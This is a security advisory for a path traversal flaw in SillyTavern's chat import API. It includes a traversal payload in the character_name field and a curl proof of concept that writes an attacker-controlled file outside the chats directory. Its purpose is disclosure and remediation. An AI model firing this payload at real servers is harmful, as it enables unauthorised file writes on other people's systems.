Severity: HIGH (8.1) · Ecosystem: npm

SillyTavern has a path traversal in `/api/chats/import` that allows arbitrary file write outside the intended chat directory

GHSA-xvww-xhx6-22pf · CVE-2026-34522


Description

Summary

A path traversal vulnerability in /api/chats/import allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into the character_name form field.

Details

The character_name field is incorporated into the destination filename and then passed to path.join(...) without sanitization. Because path.join normalizes ".." segments, a value containing them resolves to a location outside the chats directory, and the uploaded file is written there.

Evidence:

Example payload:

  • character_name=../../../../tmp/st_poc

This causes the final destination path to escape from <user>/chats/<avatar>/... and land in an attacker-chosen location such as /tmp/... (or any other path writable by the service account).

PoC

Prerequisites:

  • Valid authenticated session cookie (cookie.txt)
  • Valid CSRF token ($TOKEN)

Prepare payload:

printf '{"user_name":"u","chat_metadata":{}}\n{"name":"u","mes":"owned"}\n' >/tmp/poc.jsonl

Trigger arbitrary write:

curl -b cookie.txt -H "x-csrf-token: $TOKEN" \
  -F "avatar=@/tmp/poc.jsonl" \
  -F "file_type=jsonl" \
  -F "avatar_url=a.png" \
  -F "character_name=../../../../tmp/st_poc" \
  -F "user_name=u" \
  http://TARGET:8000/api/chats/import

Observed result:

  • A file is created outside chats directory, for example:
    /tmp/st_poc - <timestamp> imported.jsonl

Impact

  • Integrity: attacker can create files in unintended filesystem locations.
  • Availability: can be used for disk abuse and disruptive file placement.
  • Can become more severe when chained with other local processing behaviors.

Resolution

The issue was addressed in version 1.17.0.
